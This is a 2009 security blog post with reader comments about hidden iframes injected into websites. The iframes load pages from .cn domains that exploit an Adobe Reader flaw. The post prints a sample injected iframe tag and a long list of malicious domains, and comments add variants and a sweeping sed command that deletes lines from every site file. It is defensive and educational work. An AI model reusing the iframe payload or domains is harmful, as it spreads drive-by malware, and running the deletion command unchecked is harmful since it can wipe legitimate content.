msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Malicious “Income” IFrames from .CN Domains

   15 Apr 09   Filed in Website exploits

New week, new leader. I mean various hidden iframes from .cn domains injected at the bottom of home pages.

The html code looks like this

<iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>

The domain names may vary but they always end with .cn. The domain names usually contain words lot and bet. They all reside on the same server with the IP address 94 .247 .3 .150.  The iframes load pages with paths similar to  “in.cgi?incomeNN”, where NN is some arbitrary number.

Here is a list of domains used in this malware campaign:

  • lotultimatebet .cn
  • lotmachinesguide .cn
  • cheapslotplay .cn
  • lotultimatebet .cn
  • cutlot .cn
  • mediahousenameshopfilm .cn
  • betbigwager .cn
  • namebuypicture .cn
  • thelotbet .cn (added: 04.17.2009)
  • hotslotpot .cn (added: 04.17.2009)
  • mixante .cn(added: 04.19.2009)
  • lotante .cn (added: 04.19.2009)
  • superbetfair .cn (added: 04.19.2009)
  • litecartop .cn (added: 04.22.2009)
  • betworldwager .cn (added: 04.22.2009)
  • litecarfinestsite .cn (added: 04.22.2009)
  • homenameregistration .cn (added: 04.22.2009)
  • litegreatestdirect .cn (added: 04.25.2009)
  • playbetwager .cn (added: 04.25.2009)
  • nameashop .cn (added: 04.29.2009)
  • mainnameshop .cn (added: 04.29.2009)
  • superlitecarbest .cn (added: 04.29.2009)
  • internetnamestore .cn (added: 04.30.2009)
  • dotcomnameshop .cn (added: 05.02.2009)
  • mediahomenamemartvideo .cn (added: 05.11.2009)

Hidden iframe detection

As most other iframe injection exploits, this one can be easily detected by Unmask Parasites.  You will see hidden iframes in the “External References” section.

lotultimatebet.cn iframe

Sometimes you can see more then one iframe injected into the same web page.

three hidden iframes: namebuypicture.cn, cutlot.cn, lotmachinesguide.cn

Safe Browsing Diagnostics

To my surprise these iframes are poorly detected by Google. Many compromised web sites are still not listed as suspicious. And the majority of the .cn domains used in this attack are not blacklisted either.  (I’ve been submitting the malicious domains to Google for the last couple of days, to no avail.)

Flagged domains

When Google detects the malicious content you will see the follow text on Safe Browsing diagnostic pages: “Malicious software is hosted on 1 domain(s), including hyperliteautoservices .cn/.

This happens because the initial pages in the iframes redirect to a malicious script on hyperliteautoservices .cn, that checks plugins installed in a visitor’s browser and downloads either an infected PDF file or a Flash (swf) file (browsers automatically open such files).  This happens behind the scenes, so people would never know about the infection.

These files change every day which makes virus detection very problematic. I sent both files to VirusTotal and the detection rates were very low: 5/40 for readme.pdf and 2/40 for flash.swf . None of major anti-virus tools detected these files.

Adobe Acrobat vulnerability.

I checked the PDF file with another online service called Wepawet and it identified the malicious code and the exploited vulnerability. Here is the report.  This virus makes use of a known vulnerability of Adobe Acrobat (Reader) CVE-2008-2992: “Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument“.

If you are still using Acrobat Reader 8.1.2 or older, upgrade ASAP. The current version is 9.1.

This PDF file silently downloads a malicious binary (Windows executable) file from litehitscar .cn, which resides on the same server with hyperliteautoservices .cn (IP 94 .247 .3 .151). According to VirusTotal, the detection rate of this malware is very low – 3/40.

How to clean up?

  1. Start with your own computer. Scan it with anti-virus and anti-spyware tools.
  2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
  3. Now keep the new passwords secure. Don’t use auto-upload features of your web site editors. Enter passwords every time you upload new content instead. Use SFTP instead of FTP if possible.
  4. Now remove the malicious code (the iframes) from your files on server. The easiest way to do it is upload a clean content from a backup.
  5. Scan your server directories for any new/suspicious files (don’t forget to check hidden files). Remove anything that should not be there.
  6. If your site was flagged by Google, request a malware review via Webmaster Tools.
  7. Regularly check your site with diagnostics tools of your choice (my Unmask Parasites can be one of them) to be sure your site is clean.

If you have any additional information on this issue or want to ask a question, consider leaving a comment below.

Similar posts:

Reader's Comments (78)

  1. |

    My site got hit by this today. Added iframes to about 70 files on a ZenCart site. Thanks for posting this info so I could get rid of it.

  2. |

    I have two message boards which show this error. My main site seems to be unaffected. For some reason, I can not find the code on my pages yet.

    • |

      The iframes are usually injected at the very bottom of HTML code. Check files like index.html, index.php, etc.

      • |

        I have a board that was hit, too. I use YaBB 2.4 open source board for the site.

        I found the injection in the default.html file within the template folder.

        • |

          BTW: in mine, the iframe was located toward the top of the page, by the header. It gave the appearance of the entire being pushed down, with extra space at the top, above the header area.

  3. |

    I have found the files on my index.html, but everytime I remove them they reappear. Could a script be also placed on my root server?

    • |

      Did you scan your local computer for spyware?
      Did you change FTP passwords?

      Scanning your server for new/suspicious files is also a good idea. Don’t forget to check your server’s global /tmp directory.

    • |

      Did you end up getting this solved? Just got the issue and wanted to know what caused the problem for you and how you removed it

  4. |

    [...] er lige et link, så I kan læse om problemet – det kunne jo være andre end jeg kom i [...]

  5. |

    [...] IFRAME injection ですが、こちらもカナリ酷い状況になっています。 Malicious “Income” IFrames from .CN Domains New week, new leader. I mean various hidden iframes from .cn domains injected at the bottom of home [...]

  6. |

    [...] http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/ [...]

  7. |

    I have this very problem and its smashing all of my websites (approximately 4 that I know of) Its a f*cking nuisance – I cant seem to get rid of it. No virus scanners are picking it up, nor are they removing it!

    I can see my browser being redirected to these urls as mentioned above, and it seems I am unable to do much about it.

    I have searched the registry and local file system to no avail. Ive updated both adobe reader, java and shockwave. Still stuck.

    If anyone has any information on how to get rid of this crap please share it.

    • |

      Actually this exploit works silently and you shouldn’t see the redirects.

      Upgrading the Acrobat Reader and Flash will only help you avoid new infections. These upgrades won’t make your system clean if it already infected.

  8. |

    use this
    find /var/www/vhosts/ -maxdepth 999 -type f -name “*.html” -exec sed -i ‘/.cn/ d’ {} \;
    find /var/www/vhosts/ -maxdepth 999 -type f -name “*.php” -exec sed -i ‘/.cn/ d’ {} \;

    • |

      I assume this is for server admins

    • |

      my site has been infected too by this.

      can you please tell me what this command does and how to execute it?

      thank you

      • |

        This exact command is for global server administrators. As far as I can read it it searches all sites on a server for files (html and php) that include references to .cn domain.

        For an individual site owner, it’s much easier to upload a clean content from a backup.

      • |

        It searches all files with the extensions .html or .php under /var/www/vhosts/ and deletes any line containing ‘.cn’.

        This probably isn’t a very good iea, unless you are sure that there are no legitimate occurrences of the string .cn

        to just search through and find any files containing it:

        find /var/www/vhosts/ -type f -name ‘*.html’ -exec grep -H {} \;

        and the same for -name ‘*.php’, with /var/www/vhosts/ being replaced whatever your web root is.

        • |

          Ed:

          command should be :

          find /var/www/vhosts/ -type f -name ‘*.html’ -exec grep -H ‘\.cn’ {} \;

          Worth noting, if you have a stats program you could get a lot of hits from the files for that, i.e. every time someone visits your site from a .cn domain. Probably better searching on iframe:

          find /var/www/vhosts/ -type f -name ‘*.html’ -exec grep -H ‘iframe’ {} \;

          unless you have a lot of them in your code anyway.

    • |

      it helped me searched for those line in php/html files and delete those line safes alot work :P

  9. |

    I have the same problem since yesterday, 21st April 2009. Damn those hackers…

    I hope I can solve this problem soon…

  10. |

    Besides cleaning a site.
    Has anyone found a way to tell if your computer is still infected or IS infected and then spreading to sites?

  11. |

    When I am opening my site on mozilla browzer I am getting error messgage Report Site is Attack

    Please tell me how to fix this error

  12. |

    I’ve had the same problem on my test server these last few weeks. Thankfully I have nightly backups. Anyway, after some research I thought it might be related to PHP’s register_globals setting. Turns out I was right. The damn setting was on.

    Now that I’ve cleared it, attacks have stopped. So you all might wanna check if your host has left it on in php.ini. If you can’t edit your php.ini file, just add “php_flag register_globals off” at the top of your root .htaccess file.

    Cheers :)

    Akash

  13. |

    It’s good to hear about this problem, as I use Windows in one form or another at my work for web development.

    At home, though, there shouldn’t be an issue – currently on 64-bit Ubuntu 8.10 and hoping to upgrade to 9.04 soon – good luck with the executable ever having a chance in hell of running (unless they drop an ELF binary in there, and somehow manage to find a crack around standard *nix user security)…

  14. |

    I found this url in iframe with style as visibility: hidden, on my page:

    http: // nyoflak . com /?click=33FD53
    http: // litegreatestdirect .cn /in.cgi?income72

    Anyone know about this virus? please…

    • |

      litegreatestdirect is described in this article.

      nyoflak is slightly different. It seems to be injected as PHP code. Are you using PHP?

      I think they use the same infection technique so this article’s clean up instructions should work for both of them

  15. |

    This thing got into both of my sites, my IT guy noticed on the 18th and has finally figured out a way to get it off my sites, it will take another day or two to complete. It was a royal pain in the ass, If you do not have a back up of your site (in my case) pre 4/16 you have alot of work. If anyone needs help, let me know – he free lances for me and a few other places.

    Edit by Denis: I removed the site address since it is still infected.

  16. |

    i hate to say it but, i am just so pist off always starting from 0. Now that i have my sites infected, i have no idea how to clean them up. What i cant get is, whay the hell this fuckers are doing that…do someone pays them for doing it or they just do personal ego masturbation…i wish the ınternet crime compaince center catch them and fuck them nicely.

    • |

      They do it because it’s cheap to infect thousands of computers. Then they can monetize their networks of zombies. $$$$

  17. |

    Seems to like anything that has names that include index-filenames (index, default etc…)

    Tips for password: Get a passwordkeeper (I use keepass.). I use the password generator and it works great.

  18. |

    i have the same problem with most of my websites, (10 websites) and i got angry when i clean 2 and later i found out i have other 2 spamed by google. i never had this problem before and i would like to know if those i frames malware are recent shit or not. and i did you can get the virus in your computer? i know you can download them into shit programs or something alce, but any one know exactly where did i got this shit in my pc? i clean my pc and my websites but i had to start fron 0. thank you.

    • |

      I first noticed these “.cn” iframes less than a month ago. However similar exploits existed for pretty long time.

      The easiest way to get infected is to browse web sites without due protection. I.e without latest OS and browser security updates, without up-to-date antivirus/antispyware software.

  19. |

    Please add those 5 domains to your list:

    litecartop.cn
    hotslotpot.cn
    cheapslotplay.cn
    superbetfair.cn
    lotante.cn

  20. |

    [...] adres bywa różny, lista podejrzanych domen jest spora. Ten akurat podobno (bo nie sprawdzałem!) sprawdza obecność pluginu Flash luub Acrobat Readera, [...]

  21. |

    Some other domains that may be mentioned on Safe Browsing diagnostic pages:

    liteautoexcellent .cn
    liteautogreatestonline .cn

  22. |

    New modification of the same exploit:
    The “mozila” keyword is used instead of the “income”.

    Here is a sample iframe code:

    <iframe src="http: //yourlitetop .cn/ts/in.cgi?mozila7" width=2 height=4 style="visibility: hidden"></iframe>

    Known domains include:

    liteautotop .cn
    yourlitetop .cn
    liteautobestworld .cn
    greatliteautobest .cn
    thelitefinest .cn
    liteautotoponline .cn
    literideinsurance .cn
    litefinestdirect .cn

    litetopdetect .cn
    featherlitecarcare .cn

    Another modification is the banner iframes with sources from “http :// bigtruckstopseek .cn/ts/in.cgi?banner2

    giantbest .cn
    findbigname .cn
    gianttopseek .cn
    findbigwords .cn

    May 12: new pepsi modification http :// findbigboob .cn:8080 /ts/in.cgi?pepsi

    topfindworld .cn
    thebestyoucanfind .cn
    hugepremium .cn
    bigtopartists .cn
    hugebest .cn
    findbigbrother .cn
    bestwebfind .cn
    mediahomenameshoppicture .cn
    namebuyfilmlife .cn
    bigtopsuper .cn
    findyourbigwhy .cn
    findbigbearproperty .cn
    mediahousenamemartmovie .cn
    homenameworld .cn
    compoundcapitolgroup .cn
    superlottry .cn
    lotwager .cn
    blockcenterplay .cn
    filmproductionlifemedia .cn
    thebettings .cn

  23. |

    [...] featherlitecarcare.cn : 正引き不能 というか・・domainベースじゃキリがない Malicious “Income” IFrames from .CN Domains — Unmask Parasites. Blog. * lotultimatebet .cn * lotmachinesguide .cn * cheapslotplay .cn * lotultimatebet .cn * cutlot .cn [...]

  24. |

    I am also facing problem with Iframe malware. I am having a server that has multiple sites hosted. Is there any solution so that I may restrict these viruses from entering into the machine.

  25. |

    [...] http://www.pcadvisor.co.uk/news/index.cfm?newsid=12422 http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/ http://www.webmasterworld.com/google/3486931.htm [...]

  26. |

    [...] suspensions – they have among other measures enabled SFTP and started blocking .cn domains – Malicious ?Income? IFrames from .CN Domains | Unmask Parasites. Blog. Has glowhost SFTP enabled for shared accounts [...]

  27. |

    How can I block ALL .cn websites from both my computer and from my websites?

    On my computer, this would include anything in addition to the basic html page, scripts or ads, banner ads, anything.

    Individually, I use the hosts file and security list on Tools, but how can I ban the entire toplevel domain?

    Spent 2 days cleaning my site from redirect — how to code to prevent another attack?

  28. |

    Hi,
    I had the same problem whit my sites.
    I also saw my .js files are infected. There are added javascript code on the last row!

  29. |

    [...] | 20:13 | #11 Sanirim Adobe Reader’ dan dolayi olmus : http://blog.unmaskparasites.com/2009…om-cn-domains/ adresinde bu script’ i acikliyor. Ve maalesef cok fazla AV de tanimiyormus bu virusu : [...]

  30. |

    I was first hit with this on April 16th. Since then have cleaned dozens of sites. Seems to be a virus / worm that infects your machine and sends any FTP usernames and passwords to some place in china and god knows where else.

    I contacted Norton and had them scan my machine. They said it was clear. Since then I have been cleaning sites and changing FTP passwords and not storing them locally.

    I had copies all all the offending code stored in a text file on my desktop so i could easily copy it and search an infected site to clean it. The code ranged from iframs, to php, to js.

    This morning my Norton went nuts and removed the file i had stored with copies of the code. This was ONE MONTH + 3 DAYS after i contacted them and over live help submitted copies of the infection to them AND even gave them this site to look at.

  31. |

    I’m sure that most of us abandoned the IFRAME tag long ago, and the only instance is this virus.

    Can someone write a piece of code that searches files, and simply deletes everything fron to ?

    (It can’t simply delete that LINE of code, because I’ve noticed it’s not always on a new line in the code)

    Thanks! That would be a life saver.

  32. |

    It lost my code, I’ll retype with brackets:

    Can someone write a piece of code that searches files, and simply deletes everything from [iframe] to [/iframe] to ?

  33. |

    Help me please someone.

    I uploaded my site on freehostia.com. It was working fine but recently it stopped working. I saw these two iframe codes injected in the bottom of my index.php file.
    <iframe src=”http://lotmachinesguide.cn/in.cgi?income56″ width=1 height=1 style=”visibility: hi

    I am using joomla plateform for my website. please suggest how do i find the infected files and the best possible way to get rid of it.

    Please please do mail me the soultion

    Thanks
    vikrant

  34. |

    Hello,

    Does any body, know to prevent such attacks in the first place?

    Manish

    Edit by Denis: I removed your site link from your signature since the site is still infected http://www.UnmaskParasites.com/security-report/?page=excellencetechnologies.in

  35. |

    The same IFRAME hack attacked about 5 of my website which are at different Host (1und1 and united-domains.com). I am a rather private person with not much knowledge about computers and my admin left. Maybe anyone is out there who could help me to rescue my website and clean them from this fucking Virus. Of course I would pay him but really don’t have a clue what I can do to use my websites again…..

    Please help me !

    Markus

  36. |

    Your computer gets infected when you open any website already infected with this hidden iframes.

    This happened to me once, and it stole away all my stored FTP passwords from my filezilla FTP program.

    In all those sites, it added the hidden iframe to index.html and index.php files.

    If its an index.php and if you have php code it in, most probably it will break your website and show you some errors. That is how I found out about the added iframes on my pages.

    But if your pages are index.html, then the iframe addition will not break your site, and you will not notice it, but all users to your website will be infected.

    The iframe that was I was infected had a “nameashop .cn” domain.

    Best thing you can do is, block all .cn domains in your windows host file if you are using one, since I never visit any .cn sites. It’s no problem for me.

    I wonder if this stole away just my FTP passwords, or did it steal other passwords too. Anyone in here lost other passwords?

  37. |

    I also got hit with my sites.

    is it FileZilla FTP program problem or what?

    Are we safer if we use another FTP program?

    Mike

  38. |

    hi,
    I give you a script (PHP) which record all files present on your FTP and index in an HTML table the files infected by a line which look this :

    visibility: hidden
    .cn
    onload
    onunload
    eval

    Place this script in a php file (for example “iframe_work.php” and put it on your FTP.
    Launch it and see files infected.

    Find the script here :
    http://internet.umour.free.fr/script.txt

    (sorry for english, i’m french :>)

  39. |

    I’ve been dealing with this non-stop for a couple weeks…at least 5 sites so far. If anyone has a tool that will get rid of and block this locally/permanently that would be great.

    Thanks.

  40. |

    [...] größeren Ausmaßes zu sein und ist mittlerweile auch im Google-Forum angekommen. Die Liste der (meistens) .cn Domains auf die verwiesen wird ist [...]

  41. |

    I made this to delete all the files infected:


    How to clean up?

    1. Start with your own computer. Scan it with anti-virus and anti-spyware tools.
    2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
    3. Now keep the new passwords secure. Don’t use auto-upload features of your web site editors. Enter passwords every time you upload new content instead. Use SFTP instead of FTP if possible.
    4. Now remove the malicious code (the iframes) from your files on server. The easiest way to do it is upload a clean content from a backup.
    5. Scan your server directories for any new/suspicious files (don’t forget to check hidden files). Remove anything that should not be there.
    6. If your site was flagged by Google, request a malware review via Webmaster Tools.
    7. Regularly check your site with diagnostics tools of your choice (my Unmask Parasites can be one of them) to be sure your site is clean.

  42. |

    Hi all! I experienced the same problem on all sites I have access. Now I cleaned them, reinstalled my system, changed the accounts but still I’m not sure the “animal” hides anywhere on my computer as I first installed Adobe CS3 with the “damaged” version of Acrobat and upgraded it later. Does anybody know any antivirus software which can detect it?
    //excuse my English, I’m Bulgarian

  43. |

    There seems to be a new variant of this now. I have seen several sites injected with:
    Like the old one, the 58 will change from site to site.

    • |

      I guess it didn’t want to take that code block. The iframe source is now: http: //lotwager .cn:8080/ts/in.cgi?pepsi58

    • |

      Indeed, there have been various modifications of this iframe attack. I’m trying to add new domain names in this comment

      “58″ corresponds to lotwager. Other numbers correspond to the malicious domains.

  44. |

    Many of the sites I manage have been hit with this, causing me a LOT of problems.

    Does anyone know how to permanently remove this? I have tried AVG, Avast, Spybot, and Malwarebytes, but my sites continue to be attacked, even after changing the FTP passwords, so I must still have the virus. I wonder if by visiting my infected sites with my browser, am I re-infecting myself?

    Does this virus actually have a name?

  45. |

    Hi ,
    Thanx to laurent (Merci, trop cool ta check-list Im french too) and to everybody there ;-)

    I just be infected since 4 days by this (new very agressiv) worm that stole all filezilla accounts and change every index pages with an injection code (I realize that passwords aren’t crypted with Filezilla !! So now, I type myself the password…

    (I write in frenglish perhaps, sorry…)

    For those who suspect their windows to be infected :
    I’ve make (made? making? oups) a shorcut on this folder and control everytime (especially before you shutdown – i become ‘paranoiac’) :

    “C:\Documents and Settings\mon_user_name\Menu Démarrer\Programmes\Démarrage”

    In english …/yourusername/programs/start menu

    If you see a file named “rncsys32.exe”, then you are infected !

    Kill it, clear all temp in win and others temp folders and apply Laurent’s procedure.

    If some readme.pdf appears on the desktop or.., you are infected..

    That’s my sad today’s experience.

    (Personnally, I don’t understand how a php page can infect our windows….?)

    Good luck !

  46. |

    [...] first sidestepping technique is to use a nonstandard port. There have been lots of .cn-targetted iframes injected recently, and their latest trick is to use port 8080 instead of 80. Why is this effective? It’s [...]

  47. |

    When I start a Google reserch to find my site www . neolinkinternational . com show right at the top of the list however its a message there saying this site is infected and could infected anybody who could try to acess. I already talked to my IT person responsable for the my site and he sad that he cleaned and there is no more virus in my site but the message saying that the site is infected still there when I use Google reserch. Please let me know what ia should do fo fixe this problem. Thanks very much.
    Manoel Baiao

  48. |

    [...] is an older article/blog post, it does not mention these new .cn domains, but still good info: Malicious ?Income? IFrames from .CN Domains | Unmask Parasites. Blog. Does anyone have any additional information about this hack and how to eliminate this threat 100%? [...]

  49. |

    [...] information about this attack is available in this blog on Unmask Parasites regarding Malicious "Income" IFrames from .CN [...]

  50. |

    Thanks, great info… my other site had been infected by a malicious code (iframe), but cleaned already. You can also add this suspicious site:
    hostads .cn